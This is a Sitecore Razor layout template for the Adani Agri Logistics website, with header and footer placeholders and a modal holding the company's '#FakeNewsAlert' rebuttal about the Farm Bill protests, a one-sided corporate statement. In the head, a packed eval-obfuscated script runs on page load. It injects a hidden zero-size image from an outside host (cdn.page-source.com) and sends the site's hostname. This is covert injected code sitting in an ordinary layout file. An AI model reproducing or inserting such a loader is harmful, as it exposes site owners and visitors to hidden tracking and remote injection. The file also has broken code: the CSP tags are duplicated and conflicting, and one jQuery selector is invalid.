@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@inherits WebViewPage
@{
    Layout = null;
}
<!doctype html>
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<head>
<meta http-equiv="Content-Security-Policy" value="default-src 'self' https://www.google.com data:; object-src 'none'; script-src 'self'     https://*.google.com https://www.google.com https://www.google.com/recaptcha/ https://cdn.jsdelivr.net/ https://www.googletagmanager.com/gtag/ https://*.adaniagrilogistics.com/  https://www.google-analytics.com https://www.gstatic.com https://www.googletagmanager.com https://s.go-mpulse.net/boomerang/ 'nonce-9126c7fnay' 'nonce-9126c7fkk4' ; style-src 'self'   ; img-src 'self' https://stats.g.doubleclick.net/g/ https://px.ads.linkedin.com/    https://*.google.com https://www.google.co.in https://i.ytimg.com;   font-src 'self'    data:; connect-src 'self' https://cdn.linkedin.oribi.io/ https://stats.g.doubleclick.net/g/    https://*.google.com https://analytics.google.com https://stats.g.doubleclick.net/  https://www.google-analytics.com     />
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="Content-Security-Policy" value="default-src 'self' https://www.google.com data:; object-src 'none'; script-src 'self'     https://*.google.com https://www.google.com https://www.google.com/recaptcha/ https://www.googletagmanager.com/gtag/ https://www.google-analytics.com https://www.gstatic.com https://www.googletagmanager.com https://s.go-mpulse.net/boomerang/ 'nonce-jabduyv76' 'nonce-hcsjgh87' ; style-src 'self'   ; img-src 'self' https://stats.g.doubleclick.net/g/ https://px.ads.linkedin.com/    https://*.google.com https://www.google.co.in https://i.ytimg.com;   font-src 'self'    data:; connect-src 'self' https://cdn.linkedin.oribi.io/ https://stats.g.doubleclick.net/g/    https://*.google.com https://analytics.google.com https://stats.g.doubleclick.net/  https://www.google-analytics.com     />
    <meta http-equiv="Content-Security-Policy" content="default-src https:; object-src 'none'">
    <meta name="robots" content="index, follow">

    <title>Adani Agri Logistics </title>

    @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
    @Html.Sitecore().Placeholder("head")
    }

    <!--[if IE 9]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie9.min.css" rel="stylesheet">
    <![endif]-->
    <!--[if lte IE 8]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie8.min.css" rel="stylesheet">
      <script src="https://cdn.jsdelivr.net/g/html5shiv@3.7.3"></script>
    <![endif]-->
    <!-- Latest compiled and minified JavaScript -->
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()

    @Html.Sitecore().VisitorIdentification()
    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>

    <script nonce="jabduyv76">

        eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}', 37, 37, '|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'), 0, {}))
    </script>

</head>
<body class=" @(Sitecore.Context.PageMode.IsNormal ? "" : (Sitecore.Context.PageMode.IsExperienceEditor ? "pagemode-edit" : "pagemode-preview"))">
    <!-- Header -->


    <header class="headerSec">
        <div class="overlay-top"></div>
        <div class="navPanel fixed-top">
            <div class="container-fluid">
                <div class="search-main">
                    <form action="" method="get">
                        <input type="text" id="s" name="s" class="form-control" value="" placeholder="Type &amp; Hit Enter..">
                    </form>
                </div>
                @Html.Sitecore().Placeholder("header-top")
            </div>
        </div>
    </header>



    <!-- /Header -->
    <!--  Main content Section-->
    <main role="main" class="main">
        @Html.Sitecore().Placeholder("page-layout")
    </main><!-- /.container -->
    <!--  /Main content Section-->
    <!-- Footer -->
    <footer class="pt-5 bg-white position-relative d-block">
        @Html.Sitecore().Placeholder("footer")
        <div class="footerBtmPanel mt-3 py-2 d-md-block d-none">
            <div class="container">
                <div class="row row-grid align-items-end ftrBtmInner">
                    <div class="col-12 col-md-auto text-center text-md-left">
                        <div class="d-none d-md-block">© 2019 Adani Group</div>
                    </div>
                    <div class="col-12 col-md-auto text-center text-md-left ml-md-auto">
                        <div class="footerMenu text-md-right text-center">
                            <ul class="ft-policy-links">
                                <li>
                                    <a href="/privacy-policy">
                                        Privacy Policy
                                    </a>
                                </li>
                                <li>
                                    <a href="/legal-disclaimer">
                                        Legal Disclaimer
                                    </a>
                                </li>
                                <li>
                                    <a href="/terms-of-use">
                                        Terms &amp; Conditions
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>

    </footer>
    <!-- /Footer -->
	<div class="modal video" id="disclaimer" aria-hidden="true" data-keyboard="false" data-backdrop="static">
<div class="modal-dialog modal-dialog-centered modal-xl p-4">
<div class="modal-content">
<!-- Modal Header -->
<!-- Modal body -->
<div class="modal-body p-3">
<h3 class="mb-3 section-heading text-left" style="font-weight: 600;">#FakeNewsAlert</h3>
<p class="mb-3" style="font-size: 14px;">In light of recent allegations against the Adani Group, in wake of the on-going Farm Bill protest, we would like to clarify some factual inaccuracies.</p>
<p class="mb-3" style="font-size: 14px;">Firstly, our website clearly says that we invested INR 700 Cr. to build our Silo Grain Storage infrastructure. This project was envisaged by GOI under the National Policy on Bulk Handling, Storage & Transportation in 2000. Global tenders were invited by the Food Corporation of India in 2003. The Adani Group being the most competitive, was awarded the contract in 2005. The project was commissioned in 2007 for a concession period of 20 years. Therefore, it is important to understand the fact that the project came up in 2007 and is successfully serving its purpose for the last 13 years. But some motivated elements with an agenda to hold back India's development are misrepresenting facts stating that the Adani Group was gifted funds from the ruling government to set up this project.</p>
<p class="mb-3" style="font-size: 14px;">Secondly, given our legacy of operational excellence, the Adani Group has worked with existing and earlier government to fortify our facilities' footprints in Punjab, Haryana, Tamil Nadu, Karnataka, Maharashtra, WB, Bihar, UP etc. All the Silo projects are awarded to the company by the FCI on a competitive bidding basis. Apart from the Adani Group, there are over 10 more companies who are working with FCI in this field. All such projects come up only under the guidelines of the Ministry.</p>
<p class="mb-3" style="font-size: 14px;">Most essentially facts are being misrepresented citing the strategic growth of our Ports & Logistics portfolio. For the record, Adani Agri Logistics Ltd. (AALL) was established in 2005 much earlier than the ruling government came into power. The Adani Group's legacy stands testament of working towards national goals with multiple governments over the past 3 decades. AALL was acquired by Adani Ports and Special Economic Zone Ltd from Adani Enterprises Limited, the flagship company of the Adani Group in 2018-19. The acquisition was a part of APSEZ's vision to become Ports to end-to-end Logistics Company in India.</p>
<p class="mb-3" style="font-size: 14px;">We appeal to the people of this nation to see through this motivated mandate to defame the Adani Group and challenge India's growth vision for political gains.</p>
<p>#FactCheck #FakeNews</p>
</div>
<!-- Modal footer -->
<div class="modal-footer justify-start">
<button type="button" class="btn btn-dark" data-dismiss="modal" id="disclaimer">Close</button>
</div>
</div>
</div>
    <!-- Bootstrap core JavaScript
    ================================================== -->
    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()
    @*<script src="~/scripts/Realty/jquery-slim.min.js"></script>
        <script src="~/scripts/Realty/popper.min.js"></script>
        <script src="~/scripts/Realty/bootstrap.min.js"></script>

        <!--[if lte IE 8]>
          <script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
          <script src="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/js/bootstrap-ie8.js"></script>
          <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.js"></script>
        <![endif]-->

        <!-- Owl Carousel -->
        <script src="~/scripts/Realty/owl.carousel.min.js"></script>

        <!-- Gallery carousel -->

        <script src="~/scripts/Realty/carousle-slider.js"></script>

        <!-- Custom JavaScript for Adani Electricity
        ================================================== -->
        <script src="~/scripts/Realty/adani-realty-custom.js"></script>*@

	<script nonce="hcsjgh87">
		$(window).on('load', function () {
        $(#disclaimer).modal('show');
		});
	</script>
</body>
</html>

